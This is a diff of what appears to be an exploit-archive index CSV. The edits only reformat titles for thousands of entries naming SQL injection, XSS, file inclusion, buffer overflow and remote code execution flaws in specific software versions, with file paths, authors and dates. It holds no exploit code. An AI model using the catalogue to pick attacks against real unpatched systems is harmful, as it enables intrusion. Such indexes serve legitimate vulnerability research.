28970,platforms/php/webapps/28970.txt,"Dexs PM System WordPress Plugin - Authenticated Persistent XSS (0Day)",2013-10-15,TheXero,php,webapps,80 -28971,platforms/php/webapps/28971.py,"Dolibarr ERP/CMS 3.4.0 (exportcsv.php sondage param) - SQL Injection",2013-10-15,drone,php,webapps,80 +28971,platforms/php/webapps/28971.py,"Dolibarr ERP/CMS 3.4.0 - (exportcsv.php sondage param) SQL Injection",2013-10-15,drone,php,webapps,80 28972,platforms/unix/webapps/28972.rb,"Zabbix 2.0.8 - SQL Injection / Remote Code Execution (Metasploit)",2013-10-15,"Jason Kratzer",unix,webapps,0 28973,platforms/windows/remote/28973.rb,"HP Data Protector - Cell Request Service Buffer Overflow",2013-10-15,Metasploit,windows,remote,0 28974,platforms/windows/remote/28974.rb,"Microsoft Internet Explorer - CDisplayPointer Use-After-Free (MS13-080)",2013-10-15,Metasploit,windows,remote,0 @@ -26014,14 +26014,14 @@ id,file,description,date,author,platform,type,port 28977,platforms/ios/webapps/28977.txt,"UbiDisk File Manager 2.0 iOS - Multiple Web Vulnerabilities",2013-10-15,Vulnerability-Lab,ios,webapps,0 28978,platforms/ios/webapps/28978.txt,"Apple iOS 7.0.2 - Sim Lock Screen Display Bypass",2013-10-15,Vulnerability-Lab,ios,webapps,0 28979,platforms/linux/webapps/28979.txt,"DornCMS Application 1.4 - Multiple Web Vulnerabilities",2013-10-15,Vulnerability-Lab,linux,webapps,0 -28980,platforms/php/webapps/28980.txt,"WordPress 2.0.5 Functions.php - Remote File Inclusion",2006-11-11,_ANtrAX_,php,webapps,0 +28980,platforms/php/webapps/28980.txt,"WordPress 2.0.5 - Functions.php Remote File Inclusion",2006-11-11,_ANtrAX_,php,webapps,0 28981,platforms/multiple/remote/28981.txt,"IBM WebSphere 6.0 Faultactor Cross-Site Scripting",2006-11-13,"Nuri Fattah",multiple,remote,0 28982,platforms/php/webapps/28982.txt,"cPanel 10 seldir.html dir Parameter XSS",2006-11-13,"Aria-Security Team",php,webapps,0 28983,platforms/php/webapps/28983.txt,"cPanel 10 newuser.html Multiple Parameter XSS",2006-11-13,"Aria-Security Team",php,webapps,0 28984,platforms/hp-ux/local/28984.pl,"HP Tru64 4.0/5.1 - POSIX Threads Library Local Privilege Escalation",2006-11-13,"Adriel T. Desautels",hp-ux,local,0 28985,platforms/asp/webapps/28985.txt,"20/20 Real Estate 3.2 - Listings.ASP SQL Injection",2006-11-14,"Aria-Security Team",asp,webapps,0 -28986,platforms/asp/webapps/28986.asp,"ASP Portal 2.0/3.x/4.0 Default1.ASP SQL Injection",2006-11-13,ajann,asp,webapps,0 -28987,platforms/multiple/remote/28987.c,"Digipass Go3 Insecure Encryption",2006-11-13,faypou,multiple,remote,0 +28986,platforms/asp/webapps/28986.asp,"ASP Portal 2.0/3.x/4.0 - Default1.ASP SQL Injection",2006-11-13,ajann,asp,webapps,0 +28987,platforms/multiple/remote/28987.c,"Digipass Go3 - Insecure Encryption",2006-11-13,faypou,multiple,remote,0 28988,platforms/php/webapps/28988.txt,"Roundcube Webmail 0.1 - index.php Cross-Site Scripting",2006-11-13,RSnake,php,webapps,0 28989,platforms/asp/webapps/28989.txt,"INFINICART search.asp search Parameter XSS",2006-11-13,"laurent gaffie",asp,webapps,0 28990,platforms/asp/webapps/28990.txt,"INFINICART sendpassword.asp email Parameter XSS",2006-11-13,"laurent gaffie",asp,webapps,0 @@ -26035,7 +26035,7 @@ id,file,description,date,author,platform,type,port 29152,platforms/asp/webapps/29152.txt,"JiRos Link Manager 1.0 openlink.asp LinkID Parameter SQL Injection",2006-11-21,"laurent gaffie",asp,webapps,0 29153,platforms/asp/webapps/29153.txt,"JiRos Link Manager 1.0 viewlinks.asp CategoryID Parameter SQL Injection",2006-11-21,"laurent gaffie",asp,webapps,0 29154,platforms/asp/webapps/29154.txt,"CreaDirectory 1.2 - search.asp category Parameter SQL Injection",2006-11-21,"laurent gaffie",asp,webapps,0 -29155,platforms/asp/webapps/29155.txt,"CreaDirectory 1.2 addlisting.asp cat Parameter XSS",2006-11-21,"laurent gaffie",asp,webapps,0 +29155,platforms/asp/webapps/29155.txt,"CreaDirectory 1.2 - addlisting.asp cat Parameter XSS",2006-11-21,"laurent gaffie",asp,webapps,0 28998,platforms/php/webapps/28998.txt,"Phpdebug 1.1 Debug_test.php Remote File Inclusion",2006-11-12,Firewall,php,webapps,0 28999,platforms/php/webapps/28999.txt,"DirectAdmin 1.28/1.29 CMD_SHOW_RESELLER user Parameter XSS",2006-11-12,"Aria-Security Team",php,webapps,0 29000,platforms/php/webapps/29000.txt,"DirectAdmin 1.28/1.29 CMD_SHOW_USER user Parameter XSS",2006-11-12,"Aria-Security Team",php,webapps,0 @@ -26049,7 +26049,7 @@ id,file,description,date,author,platform,type,port 29008,platforms/asp/webapps/29008.txt,"FunkyASP Glossary 1.0 Glossary.ASP SQL Injection",2006-11-14,saps.audit,asp,webapps,0 29009,platforms/asp/webapps/29009.txt,"SitesOutlet Ecommerce Kit Multiple SQL Injection",2006-11-15,"laurent gaffie",asp,webapps,0 29010,platforms/asp/webapps/29010.txt,"SiteXpress E-Commerce System Dept.ASP SQL Injection",2006-11-14,"Aria-Security Team",asp,webapps,0 -29011,platforms/asp/webapps/29011.txt,"ASPIntranet 2.1 Default.ASP SQL Injection",2006-11-14,"Aria-Security Team",asp,webapps,0 +29011,platforms/asp/webapps/29011.txt,"ASPIntranet 2.1 - Default.ASP SQL Injection",2006-11-14,"Aria-Security Team",asp,webapps,0 29012,platforms/asp/webapps/29012.txt,"DMXReady Site Engine Manager 1.0 - Index.ASP SQL Injection",2006-11-14,"Aria-Security Team",asp,webapps,0 29013,platforms/asp/webapps/29013.txt,"Pilot Cart 7.2 Pilot.ASP SQL Injection",2006-11-14,"laurent gaffie",asp,webapps,0 29014,platforms/asp/webapps/29014.txt,"Car Site Manager csm/asp/listings.asp Multiple Parameter SQL Injection",2006-11-14,"laurent gaffie",asp,webapps,0 @@ -26080,7 +26080,7 @@ id,file,description,date,author,platform,type,port 29041,platforms/asp/webapps/29041.txt,"Yetihost Helm 3.2.10 - Multiple Cross-Site Scripting Vulnerabilities",2006-11-15,"Aria-Security Team",asp,webapps,0 29042,platforms/asp/webapps/29042.txt,"Dragon Internet Events Listing 2.0.01 venue_detail.asp VenueID Parameter SQL Injection",2006-11-15,"Benjamin Moss",asp,webapps,0 29043,platforms/asp/webapps/29043.txt,"Dragon Internet Events Listing 2.0.01 event_searchdetail.asp ID Parameter SQL Injection",2006-11-15,"Benjamin Moss",asp,webapps,0 -29044,platforms/asp/webapps/29044.txt,"Dragon Internet Events Listing 2.0.01 admin_login.asp Multiple Field SQL Injection",2006-11-15,"Benjamin Moss",asp,webapps,0 +29044,platforms/asp/webapps/29044.txt,"Dragon Internet Events Listing 2.0.01 - admin_login.asp Multiple Field SQL Injection",2006-11-15,"Benjamin Moss",asp,webapps,0 29045,platforms/windows/remote/29045.txt,"Selenium Web Server 1.0 - XSS",2006-11-15,"Greg Linares",windows,remote,0 29046,platforms/asp/webapps/29046.txt,"ASPIntranet 2.1 - Mutiple SQL Injection",2006-11-15,"Aria-Security Team",asp,webapps,0 29047,platforms/php/webapps/29047.txt,"Hot Links Perl PHP Information Disclosure",2006-11-15,hack2prison,php,webapps,0 @@ -26091,9 +26091,9 @@ id,file,description,date,author,platform,type,port 29052,platforms/php/webapps/29052.txt,"Bloo 1.00 Googlespell_Proxy.php Cross-Site Scripting",2006-11-16,the_Edit0r,php,webapps,0 29053,platforms/asp/webapps/29053.txt,"Image gallery with Access Database dispimage.asp id Parameter SQL Injection",2006-11-16,"Aria-Security Team",asp,webapps,0 29054,platforms/asp/webapps/29054.txt,"Image gallery with Access Database default.asp Multiple Parameter SQL Injection",2006-11-16,"Aria-Security Team",asp,webapps,0 -29055,platforms/php/webapps/29055.txt,"Eggblog 3.1 admin/articles.php edit Parameter XSS",2006-11-16,the_Edit0r,php,webapps,0 -29056,platforms/php/webapps/29056.txt,"Eggblog 3.1 admin/comments.php edit Parameter XSS",2006-11-16,the_Edit0r,php,webapps,0 -29057,platforms/php/webapps/29057.txt,"Eggblog 3.1 admin/users.php add Parameter XSS",2006-11-16,the_Edit0r,php,webapps,0 +29055,platforms/php/webapps/29055.txt,"Eggblog 3.1 - admin/articles.php edit Parameter XSS",2006-11-16,the_Edit0r,php,webapps,0 +29056,platforms/php/webapps/29056.txt,"Eggblog 3.1 - admin/comments.php edit Parameter XSS",2006-11-16,the_Edit0r,php,webapps,0 +29057,platforms/php/webapps/29057.txt,"Eggblog 3.1 - admin/users.php add Parameter XSS",2006-11-16,the_Edit0r,php,webapps,0 29058,platforms/php/webapps/29058.txt,"phpMyAdmin 2.x - db_create.php db Parameter XSS",2006-09-15,"laurent gaffie",php,webapps,0 29059,platforms/php/webapps/29059.txt,"phpMyAdmin 2.x - db_operations.php Multiple Parameter XSS",2006-09-15,"laurent gaffie",php,webapps,0 29060,platforms/php/webapps/29060.txt,"phpMyAdmin 2.x - querywindow.php Multiple Parameter XSS",2006-09-15,"laurent gaffie",php,webapps,0 @@ -26104,7 +26104,7 @@ id,file,description,date,author,platform,type,port 29065,platforms/php/webapps/29065.txt,"WHMCS 5.2.8 - SQL Injection",2013-10-19,g00n,php,webapps,0 29150,platforms/php/webapps/29150.txt,"WordPress SAICO Theme 1.0-1.0.2 - Arbitrary File Upload",2013-10-24,"Byakuya Kouta",php,webapps,0 29148,platforms/windows/dos/29148.txt,"ASF Demux for VLC 2.0.x - DoS (POC)",2013-10-23,"Pedro Ribeiro",windows,dos,0 -29221,platforms/cgi/webapps/29221.txt,"BlueSocket BSC 2100 5.0/5.1 Admin.PL Cross-Site Scripting",2006-12-04,"Jesus Olmos Gonzalez",cgi,webapps,0 +29221,platforms/cgi/webapps/29221.txt,"BlueSocket BSC 2100 5.0/5.1 - Admin.PL Cross-Site Scripting",2006-12-04,"Jesus Olmos Gonzalez",cgi,webapps,0 29222,platforms/php/webapps/29222.txt,"Cerberus Helpdesk 2.x - Spellwin.php Cross-Site Scripting",2006-12-04,"En Douli",php,webapps,0 29068,platforms/php/webapps/29068.txt,"WordPress Area53 theme - Arbitrary File Upload",2013-10-19,"Byakuya Kouta",php,webapps,80 29069,platforms/windows/local/29069.c,"Computer Associates Personal Firewall 9.0 - HIPS Driver (kmxfw.sys) Local Privilege Escalation",2006-11-16,"Ruben Santamarta ",windows,local,0 @@ -26120,11 +26120,11 @@ id,file,description,date,author,platform,type,port 29079,platforms/php/webapps/29079.txt,"VBulletin 3.6.x - Admin Control Panel Index.php Multiple Cross-Site Scripting Vulnerabilities",2006-11-17,insanity,php,webapps,0 29080,platforms/asp/webapps/29080.txt,"BestWebApp Dating Site Login Component Multiple Field SQL Injection",2006-11-17,"laurent gaffie",asp,webapps,0 29081,platforms/asp/webapps/29081.txt,"BestWebApp Dating Site login_form.asp msg Parameter XSS",2006-11-17,"laurent gaffie",asp,webapps,0 -29085,platforms/asp/webapps/29085.txt,"A-CART 2.0 category.asp catcode Parameter SQL Injection",2006-11-18,"laurent gaffie",asp,webapps,0 -29084,platforms/asp/webapps/29084.txt,"A-Cart Pro 2.0 product.asp productid Parameter SQL Injection",2006-11-18,"laurent gaffie",asp,webapps,0 +29085,platforms/asp/webapps/29085.txt,"A-CART 2.0 - category.asp catcode Parameter SQL Injection",2006-11-18,"laurent gaffie",asp,webapps,0 +29084,platforms/asp/webapps/29084.txt,"A-Cart Pro 2.0 - product.asp productid Parameter SQL Injection",2006-11-18,"laurent gaffie",asp,webapps,0 29083,platforms/windows/remote/29083.txt,"Sage 1.3.x - IMG Element Input Validation",2006-09-08,"Kevin Kierznowski",windows,remote,0 -29087,platforms/asp/webapps/29087.txt,"ActiveNews Manager default.asp page Parameter SQL Injection",2006-11-18,"laurent gaffie",asp,webapps,0 -29088,platforms/asp/webapps/29088.txt,"ActiveNews Manager activenews_search.asp query Parameter XSS",2006-11-18,"laurent gaffie",asp,webapps,0 +29087,platforms/asp/webapps/29087.txt,"ActiveNews Manager - default.asp page Parameter SQL Injection",2006-11-18,"laurent gaffie",asp,webapps,0 +29088,platforms/asp/webapps/29088.txt,"ActiveNews Manager - activenews_search.asp query Parameter XSS",2006-11-18,"laurent gaffie",asp,webapps,0 29089,platforms/asp/webapps/29089.txt,"Active News Manager - activeNews_categories.asp catID Parameter SQL Injection",2006-11-18,"laurent gaffie",asp,webapps,0 29090,platforms/asp/webapps/29090.txt,"Active News Manager - activeNews_comments.asp articleID Parameter SQL Injection",2006-11-18,"laurent gaffie",asp,webapps,0 29091,platforms/php/webapps/29091.txt,"ZonPHP 2.25 - Remote Code Execution (RCE)",2013-10-20,"Halim Cruzito",php,webapps,0 @@ -26148,7 +26148,7 @@ id,file,description,date,author,platform,type,port 29107,platforms/asp/webapps/29107.txt,"Grandora Rialto 1.6 - /admin/default.asp Multiple Field SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 29108,platforms/asp/webapps/29108.txt,"Grandora Rialto 1.6 listfull.asp ID Parameter SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 29109,platforms/asp/webapps/29109.txt,"Grandora Rialto 1.6 listmain.asp cat Parameter SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 -29110,platforms/asp/webapps/29110.txt,"Grandora Rialto 1.6 printmain.asp ID Parameter SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 +29110,platforms/asp/webapps/29110.txt,"Grandora Rialto 1.6 - printmain.asp ID Parameter SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 29111,platforms/asp/webapps/29111.txt,"Grandora Rialto 1.6 - searchkey.asp Multiple Parameter SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 29112,platforms/asp/webapps/29112.txt,"Grandora Rialto 1.6 - searchmain.asp Multiple Parameter SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 29113,platforms/asp/webapps/29113.txt,"Grandora Rialto 1.6 - searchoption.asp Multiple Parameter SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 @@ -26165,7 +26165,7 @@ id,file,description,date,author,platform,type,port 29125,platforms/windows/local/29125.txt,"Avira Internet Security - avipbb.sys Filter Bypass and Privilege Escalation",2013-10-22,"Ahmad Moghimi",windows,local,0 29126,platforms/asp/webapps/29126.txt,"Gnews Publisher Multiple SQL Injection",2006-11-20,"Aria-Security Team",asp,webapps,0 29127,platforms/hardware/remote/29127.rb,"D-Link DIR-605L Captcha Handling Buffer Overflow",2013-10-22,Metasploit,hardware,remote,80 -29128,platforms/php/webapps/29128.txt,"Vikingboard 0.1.2 admin.php act Parameter Traversal Arbitrary File Access",2006-11-20,"laurent gaffie",php,webapps,0 +29128,platforms/php/webapps/29128.txt,"Vikingboard 0.1.2 - admin.php act Parameter Traversal Arbitrary File Access",2006-11-20,"laurent gaffie",php,webapps,0 29129,platforms/windows/remote/29129.rb,"Interactive Graphical SCADA System Remote Command Injection",2013-10-22,Metasploit,windows,remote,12397 29130,platforms/windows/remote/29130.rb,"HP Intelligent Management Center BIms UploadServlet Directory Traversal",2013-10-22,Metasploit,windows,remote,8080 29131,platforms/hardware/webapps/29131.rb,"ARRIS DG860A NVRAM Backup Password Disclosure",2013-10-22,"Justin Oberdorf",hardware,webapps,80 @@ -26175,7 +26175,7 @@ id,file,description,date,author,platform,type,port 29135,platforms/asp/webapps/29135.txt,"Rapid Classified 3.1 - search.asp SH1 Parameter XSS",2006-11-20,"laurent gaffie",asp,webapps,0 29136,platforms/asp/webapps/29136.txt,"Rapid Classified 3.1 reply.asp Multiple Parameter XSS",2006-11-20,"laurent gaffie",asp,webapps,0 29137,platforms/asp/webapps/29137.txt,"Rapid Classified 3.1 - advsearch.asp DoSearch Parameter XSS",2006-11-20,"laurent gaffie",asp,webapps,0 -29157,platforms/php/webapps/29157.txt,"Seditio 1.10 Users.Profile.Inc.php SQL Injection",2006-11-21,"Mustafa Can Bjorn",php,webapps,0 +29157,platforms/php/webapps/29157.txt,"Seditio 1.10 - Users.Profile.Inc.php SQL Injection",2006-11-21,"Mustafa Can Bjorn",php,webapps,0 29158,platforms/php/webapps/29158.txt,"CuteNews 1.4.5 show_news.php Query String XSS",2006-11-21,"Alireza Hassani",php,webapps,0 29159,platforms/php/webapps/29159.txt,"CuteNews 1.4.5 rss.php rss_title Parameter XSS",2006-11-21,"Alireza Hassani",php,webapps,0 29160,platforms/linux/remote/29160.c,"GNU Tar 1.1x GNUTYPE_NAMES Remote Directory Traversal",2006-11-21,"Teemu Salmela",linux,remote,0 @@ -26201,7 +26201,7 @@ id,file,description,date,author,platform,type,port 29216,platforms/asp/webapps/29216.html,"Aspee Ziyaretci Defteri giris.asp Multiple Field SQL Injection",2006-12-01,ShaFuq31,asp,webapps,0 29170,platforms/windows/dos/29170.c,"Nvidia NView 3.5 Keystone.EXE Local Denial of Service",2006-11-23,Hessam-x,windows,dos,0 29171,platforms/windows/remote/29171.txt,"Business Objects Crystal Reports XI Professional File Handling Buffer Overflow",2006-11-23,LSsec.com,windows,remote,0 -29172,platforms/windows/dos/29172.txt,"Microsoft Office 97 HTMLMARQ.OCX Library Denial of Service",2006-11-22,"Michal Bucko",windows,dos,0 +29172,platforms/windows/dos/29172.txt,"Microsoft Office 97 - HTMLMARQ.OCX Library Denial of Service",2006-11-22,"Michal Bucko",windows,dos,0 29173,platforms/php/webapps/29173.txt,"Active PHP Bookmarks 1.1.2 - APB_SETTINGS['apb_path'] Multiple Remote File Inclusion",2006-11-23,ThE-LoRd-Of-CrAcKiNg,php,webapps,0 29174,platforms/asp/webapps/29174.txt,"MidiCart ASP Item_Show.ASP ID2006quant Parameter SQL Injection",2006-11-24,"Aria-Security Team",asp,webapps,0 29175,platforms/php/webapps/29175.txt,"Simple PHP Gallery 1.1 System SP_Index.php Cross-Site Scripting",2006-11-24,"Al7ejaz Hacker",php,webapps,0 @@ -26212,7 +26212,7 @@ id,file,description,date,author,platform,type,port 29180,platforms/asp/webapps/29180.txt,"SIAP CMS Login.ASP SQL Injection",2006-11-25,nagazakig74,asp,webapps,0 29181,platforms/php/webapps/29181.txt,"CPanel 11 Beta - Multiple Cross-Site Scripting Vulnerabilities",2006-11-25,"Aria-Security Team",php,webapps,0 29182,platforms/php/webapps/29182.txt,"cPanel WebHost Manager 3.1 dochangeemail email Parameter XSS",2006-11-25,"Aria-Security Team",php,webapps,0 -29183,platforms/php/webapps/29183.txt,"cPanel WebHost Manager 3.1 addon_configsupport.cgi supporturl Parameter XSS",2006-11-25,"Aria-Security Team",php,webapps,0 +29183,platforms/php/webapps/29183.txt,"cPanel WebHost Manager 3.1 - addon_configsupport.cgi supporturl Parameter XSS",2006-11-25,"Aria-Security Team",php,webapps,0 29184,platforms/php/webapps/29184.txt,"cPanel WebHost Manager 3.1 editpkg pkg Parameter XSS",2006-11-25,"Aria-Security Team",php,webapps,0 29185,platforms/php/webapps/29185.txt,"cPanel WebHost Manager 3.1 domts2 domain Parameter XSS",2006-11-25,"Aria-Security Team",php,webapps,0 29186,platforms/php/webapps/29186.txt,"cPanel WebHost Manager 3.1 editzone domain Parameter XSS",2006-11-25,"Aria-Security Team",php,webapps,0 @@ -26243,9 +26243,9 @@ id,file,description,date,author,platform,type,port 29234,platforms/windows/local/29234.py,"VideoCharge Studio 2.12.3.685 - Buffer Overflow (SEH)",2013-10-27,metacom,windows,local,0 29210,platforms/php/remote/29210.rb,"Open Flash Chart 2 - Arbitrary File Upload",2013-10-26,Metasploit,php,remote,80 29230,platforms/windows/remote/29230.html,"Citrix Presentation Server Client 9.200 - WFICA.OCX ActiveX Component Heap Buffer Overflow",2006-12-06,"Andrew Christensen",windows,remote,0 -29223,platforms/php/webapps/29223.txt,"Inside Systems Mail 2.0 Error.php Cross-Site Scripting",2006-12-04,"Vicente Aguilera Diaz",php,webapps,0 +29223,platforms/php/webapps/29223.txt,"Inside Systems Mail 2.0 - Error.php Cross-Site Scripting",2006-12-04,"Vicente Aguilera Diaz",php,webapps,0 29224,platforms/asp/webapps/29224.txt,"UApplication UGuestbook 1.0 - Index.ASP SQL Injection",2006-12-04,"Aria-Security Team",asp,webapps,0 -29225,platforms/php/webapps/29225.txt,"ac4p Mobile up.php Taaa Parameter XSS",2006-12-04,SwEET-DeViL,php,webapps,0 +29225,platforms/php/webapps/29225.txt,"ac4p Mobile - up.php Taaa Parameter XSS",2006-12-04,SwEET-DeViL,php,webapps,0 29226,platforms/php/webapps/29226.txt,"ac4p Mobile - polls.php Multiple Parameter XSS (2)",2006-12-04,SwEET-DeViL,php,webapps,0 29227,platforms/asp/webapps/29227.txt,"Vt-Forum Lite 1.3 vf_info.asp StrMes Parameter XSS",2006-12-04,St@rExT,asp,webapps,0 29228,platforms/asp/webapps/29228.txt,"Vt-Forum Lite 1.3 vf_newtopic.asp IFRAME Element XSS",2006-12-04,St@rExT,asp,webapps,0 @@ -26261,13 +26261,13 @@ id,file,description,date,author,platform,type,port 29243,platforms/php/webapps/29243.txt,"Messageriescripthp 2.0 existepseudo.php pseudo Parameter XSS",2006-12-09,Mr_KaLiMaN,php,webapps,0 29244,platforms/php/webapps/29244.txt,"Messageriescripthp 2.0 existeemail.php email Parameter XSS",2006-12-09,Mr_KaLiMaN,php,webapps,0 29245,platforms/php/webapps/29245.txt,"Messageriescripthp 2.0 Contact/contact.php Multiple Parameter XSS",2006-12-09,Mr_KaLiMaN,php,webapps,0 -29246,platforms/php/webapps/29246.txt,"AnnonceScriptHP 2.0 admin/admin_membre/fiche_membre.php idmembre Parameter SQL Injection",2006-12-09,Mr_KaLiMaN,php,webapps,0 +29246,platforms/php/webapps/29246.txt,"AnnonceScriptHP 2.0 - admin/admin_membre/fiche_membre.php idmembre Parameter SQL Injection",2006-12-09,Mr_KaLiMaN,php,webapps,0 29247,platforms/php/webapps/29247.txt,"AnnonceScriptHP 2.0 erreurinscription.php email Parameter XSS",2006-12-09,Mr_KaLiMaN,php,webapps,0 29248,platforms/php/webapps/29248.txt,"AnnonceScriptHP 2.0 Templates/admin.dwt.php email Parameter XSS",2006-12-09,Mr_KaLiMaN,php,webapps,0 29249,platforms/php/webapps/29249.txt,"AnnonceScriptHP 2.0 Templates/commun.dwt.php email Parameter XSS",2006-12-09,Mr_KaLiMaN,php,webapps,0 29250,platforms/php/webapps/29250.txt,"AnnonceScriptHP 2.0 membre.dwt.php email Parameter XSS",2006-12-09,Mr_KaLiMaN,php,webapps,0 -29251,platforms/php/webapps/29251.txt,"AnnonceScriptHP 2.0 admin/admin_config/Aide.php email Parameter XSS",2006-12-09,Mr_KaLiMaN,php,webapps,0 -29252,platforms/php/webapps/29252.txt,"AnnonceScriptHP 2.0 email.php id Parameter SQL Injection",2006-12-09,Mr_KaLiMaN,php,webapps,0 +29251,platforms/php/webapps/29251.txt,"AnnonceScriptHP 2.0 - admin/admin_config/Aide.php email Parameter XSS",2006-12-09,Mr_KaLiMaN,php,webapps,0 +29252,platforms/php/webapps/29252.txt,"AnnonceScriptHP 2.0 - email.php id Parameter SQL Injection",2006-12-09,Mr_KaLiMaN,php,webapps,0 29253,platforms/php/webapps/29253.txt,"AnnonceScriptHP 2.0 voirannonce.php no Parameter SQL Injection",2006-12-09,Mr_KaLiMaN,php,webapps,0 29254,platforms/php/webapps/29254.txt,"KDPics 1.11/1.16 - index.php3 categories Parameter XSS",2006-12-09,Mr_KaLiMaN,php,webapps,0 29255,platforms/php/webapps/29255.txt,"KDPics 1.11/1.16 galeries.inc.php3 categories Parameter XSS",2006-12-09,Mr_KaLiMaN,php,webapps,0 @@ -26278,7 +26278,7 @@ id,file,description,date,author,platform,type,port 29264,platforms/php/webapps/29264.txt,"Onpub CMS 1.4 / 1.5 - Multiple SQL Injection",2013-10-28,Vulnerability-Lab,php,webapps,0 29265,platforms/php/webapps/29265.txt,"ILIAS eLearning CMS 4.3.4 & 4.4 - Persistent XSS",2013-10-29,Vulnerability-Lab,php,webapps,0 29266,platforms/hardware/webapps/29266.txt,"Stem Innovation 'IZON' Hard-coded Credentials",2013-10-29,"Mark Stanislav",hardware,webapps,0 -29267,platforms/php/webapps/29267.txt,"ProNews 1.5 admin/change.php Multiple Parameter XSS",2006-12-09,Mr_KaLiMaN,php,webapps,0 +29267,platforms/php/webapps/29267.txt,"ProNews 1.5 - admin/change.php Multiple Parameter XSS",2006-12-09,Mr_KaLiMaN,php,webapps,0 29268,platforms/php/webapps/29268.txt,"ProNews 1.5 lire-avis.php aa Parameter SQL Injection",2006-12-09,Mr_KaLiMaN,php,webapps,0 29269,platforms/php/webapps/29269.txt,"ProNews 1.5 lire-avis.php aa Parameter XSS",2006-12-09,Mr_KaLiMaN,php,webapps,0 29270,platforms/php/webapps/29270.txt,"MXBB Profile Control Panel 0.91c Module Remote File Inclusion",2006-12-09,bd0rk,php,webapps,0 @@ -26291,7 +26291,7 @@ id,file,description,date,author,platform,type,port 29284,platforms/php/webapps/29284.txt,"Moodle 1.5/1.6 mod/forum/discuss.php navtail Parameter XSS",2006-12-14,"Jose Miguel Yanez Venegas",php,webapps,0 29285,platforms/windows/dos/29285.txt,"Microsoft Windows Media 6.4/10.0 - MID Malformed Header Chunk DoS",2006-12-15,shinnai,windows,dos,0 29286,platforms/windows/dos/29286.txt,"Microsoft Windows Explorer explorer.exe WMV File Handling DoS",2006-12-15,shinnai,windows,dos,0 -29287,platforms/windows/dos/29287.txt,"Multiple Vendor Firewall HIPS Process Spoofing",2006-12-15,"Matousec Transparent security",windows,dos,0 +29287,platforms/windows/dos/29287.txt,"Multiple Vendor Firewall - HIPS Process Spoofing",2006-12-15,"Matousec Transparent security",windows,dos,0 29288,platforms/asp/webapps/29288.txt,"Omniture SiteCatalyst Multiple Cross-Site Scripting Vulnerabilities",2006-12-16,"Hackers Center Security",asp,webapps,0 29289,platforms/php/webapps/29289.php,"eXtreme-fusion 4.02 Fusion_Forum_View.php Local File Inclusion",2006-12-16,Kacper,php,webapps,0 29290,platforms/php/remote/29290.c,"Apache + PHP < 5.3.12 / < 5.4.2 - cgi-bin Remote Code Execution Exploit",2013-10-29,kingcope,php,remote,80 @@ -26309,12 +26309,12 @@ id,file,description,date,author,platform,type,port 29304,platforms/php/webapps/29304.txt,"Calacode @Mail Webmail 4.51 Filtering Engine HTML Injection",2006-12-20,"Philippe C. Caturegli",php,webapps,0 29292,platforms/windows/webapps/29292.txt,"XAMPP for Windows 1.8.2 - Blind SQL Injection",2013-10-29,"Sebastián Magof",windows,webapps,0 29305,platforms/multiple/dos/29305.txt,"FTPRush 1.0.610 - Host Field Local Buffer Overflow",2006-12-22,"Umesh Wanve",multiple,dos,0 -29306,platforms/php/webapps/29306.txt,"A-Blog 1.0 Unspecified Cross-Site Scripting",2006-12-22,Fukumori,php,webapps,0 +29306,platforms/php/webapps/29306.txt,"A-Blog 1.0 - Unspecified Cross-Site Scripting",2006-12-22,Fukumori,php,webapps,0 29307,platforms/windows/dos/29307.c,"Softmaker Office 2012 - TextMaker Memory Corruption",2013-10-30,"Arash Allebrahim",windows,dos,0 29308,platforms/php/webapps/29308.txt,"Oracle Portal 9i/10g Container_Tabs.JSP Cross-Site Scripting",2006-12-22,"putosoft softputo",php,webapps,0 29309,platforms/windows/local/29309.pl,"AudioCoder 0.8.22 - (.m3u) SEH Buffer Overflow",2013-10-30,"Mike Czumak",windows,local,0 29310,platforms/multiple/dos/29310.txt,"WikiReader 1.12 URL Field Local Buffer Overflow",2006-12-22,"Umesh Wanve",multiple,dos,0 -29311,platforms/php/webapps/29311.txt,"Xt-News 0.1 add_comment.php id_news Parameter XSS",2006-12-22,Mr_KaLiMaN,php,webapps,0 +29311,platforms/php/webapps/29311.txt,"Xt-News 0.1 - add_comment.php id_news Parameter XSS",2006-12-22,Mr_KaLiMaN,php,webapps,0 29312,platforms/hardware/webapps/29312.txt,"Unicorn Router WB-3300NR - CSRF (Factory Reset/DNS Change)",2013-10-30,absane,hardware,webapps,0 29313,platforms/php/webapps/29313.txt,"Xt-News 0.1 show_news.php id_news Parameter XSS",2006-12-22,Mr_KaLiMaN,php,webapps,0 29314,platforms/php/webapps/29314.txt,"Xt-News 0.1 show_news.php id_news Parameter SQL Injection",2006-12-22,Mr_KaLiMaN,php,webapps,0 @@ -26343,7 +26343,7 @@ id,file,description,date,author,platform,type,port 29336,platforms/asp/webapps/29336.txt,"Chatwm 1.0 SelGruFra.ASP SQL Injection",2006-12-24,ShaFuq31,asp,webapps,0 29337,platforms/php/webapps/29337.txt,"TimberWolf 1.2.2 ShowNews.php Cross-Site Scripting",2006-12-24,CorryL,php,webapps,0 29338,platforms/php/webapps/29338.txt,"VBulletin 3.5.x/3.6.x - SWF Script Injection",2006-12-25,"Ashraf Morad",php,webapps,0 -29339,platforms/php/webapps/29339.txt,"PHP Live! 3.2.2 setup/transcripts.php search_string Parameter XSS",2006-12-25,"Hackers Center Security",php,webapps,0 +29339,platforms/php/webapps/29339.txt,"PHP Live! 3.2.2 - setup/transcripts.php search_string Parameter XSS",2006-12-25,"Hackers Center Security",php,webapps,0 29340,platforms/php/webapps/29340.txt,"PHP Live! 3.2.2 - index.php l Parameter XSS",2006-12-25,"Hackers Center Security",php,webapps,0 29341,platforms/php/webapps/29341.txt,"PHP Live! 3.2.2 phplive/message_box.php Multiple Parameter XSS",2006-12-25,"Hackers Center Security",php,webapps,0 29342,platforms/php/webapps/29342.txt,"Luckybot 3 DIR Parameter Multiple Remote File Inclusion",2006-12-26,Red_Casper,php,webapps,0 @@ -26365,7 +26365,7 @@ id,file,description,date,author,platform,type,port 29356,platforms/php/webapps/29356.txt,"WordPress 1.x/2.0.x - Template.php HTML Injection",2006-12-27,"David Kierznowski",php,webapps,0 29357,platforms/asp/webapps/29357.txt,"Hosting Controller 